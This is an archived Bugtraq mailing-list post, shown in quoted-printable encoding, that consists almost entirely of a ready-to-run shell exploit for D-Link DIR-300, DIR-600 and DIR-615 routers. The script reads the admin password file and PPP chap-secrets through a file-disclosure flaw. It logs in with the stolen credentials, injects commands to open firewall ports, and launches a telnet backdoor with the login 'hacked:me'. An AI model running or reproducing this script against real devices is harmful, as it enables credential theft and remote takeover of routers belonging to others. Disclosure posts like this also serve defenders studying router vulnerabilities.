看板 Bugtraq 關於我們 聯絡資訊
General info: =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D A lot have been already said about SOHO routers. Thus, without further ado = another nail in the coffin. knock knock =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D -- cut =23=21/bin/sh if =5B -z =22=241=22 =5D; then echo =22d-link DIR-300 (all), DIR-600 (all), DIR-615 (fw 4.0)=22; echo =22exploited by AKAT-1, = 22733db72ab3ed94b5f8a1ffcde850251fe6f466, = c8e74ebd8392fda4788179f9a02bb49337638e7b=22; echo =22usage: =240 =5Brouter address=5D =5Btelnet port=5D=22; exit 0; fi; if =5B -z =22=242=22 =5D; then TPORT=3D3333; else TPORT=3D=242; fi UPORT=3D31337; echo =22Trying =241 ...=22; HTTPASSWD=3D=60curl -sS = =22http://=241/model/__show_info.php?REQUIRE_FILE=3D/var/etc/httpasswd=22 = =7C grep -A1 =22<center>=22 =7C tail -1 =7C sed -e =22s/=5Ct//g ; = s/=5E=5C(=5B=5E:=5D*=5C):=5C(=5B=5E:=5D*=5C)=24/=5C1=5Cn =5C2/g=22=60; if =5B =21 -z =22=24HTTPASSWD=22 =5D; then L=3D=60echo =24HTTPASSWD =7C cut -d' ' -f1=60; P=3D=60echo =24HTTPASSWD =7C cut -d' ' -f2=60; echo =22found username: =24L=22; echo =22found password: =24P=22; curl -d = =22ACTION_POST=3DLOGIN&LOGIN_USER=3D=24L&LOGIN_PASSWD=3D=24P=22 -sS = =22http://=241/login.php=22 =7C grep -v =22fail=22 1>/dev/null; if =5B =24? -eq 0 =5D; then curl -sS = =22http://=241/tools_system.xgi?random_num=3D2011.9.22.13.59.33&exeshell=3D= =2E./../../../usr/sbin/iptables -t nat -A PRE_MISC -i eth0.2 -p tcp = --dport =24TPORT -j ACCEPT&set/runtime/syslog/sendmail=3D1=22 1>/dev/null; curl -sS = =22http://=241/tools_system.xgi?random_num=3D2011.9.22.13.59.33&exeshell=3D= =2E./../../../usr/sbin/iptables -t nat -A PRE_MISC -i eth0.2 -p tcp = --dport =24UPORT -j ACCEPT&set/runtime/syslog/sendmail=3D1=22 1>/dev/null; curl -sS = =22http://=241/tools_system.xgi?random_num=3D2011.9.22.13.59.33&exeshell=3D= =2E./../../../usr/sbin/telnetd -p =24TPORT -l /usr/sbin/login -u = hacked:me&set/runtime/syslog/sendmail=3D1=22 1>/dev/null; echo =22if you are lucky telnet is listening on =24TPORT = (hacked:me) ...=22 curl -sS =22http://=241/logout.php=22 1>/dev/null; fi fi CHAP=3D=60curl -sS = =22http://=241/model/__show_info.php?REQUIRE_FILE=3D/etc/ppp/chap-secrets= =22 =7C grep -A1 =22<center>=22 =7C sed -e =22s/<center>//g=22=60; if =5B =21 -z =22=24CHAP=22 =5D; then echo =22found chap-secrets: =24CHAP=22; fi echo =22Bye bye.=22; exit 0; -- cut Credits: =3D=3D=3D=3D=3D=3D=3D=3D echo =24use_the_source_luke ____________________________________________________________ FREE 3D MARINE AQUARIUM SCREENSAVER - Watch dolphins, sharks & orcas on = your desktop=21 Check it out at http://www.inbox.com/marineaquarium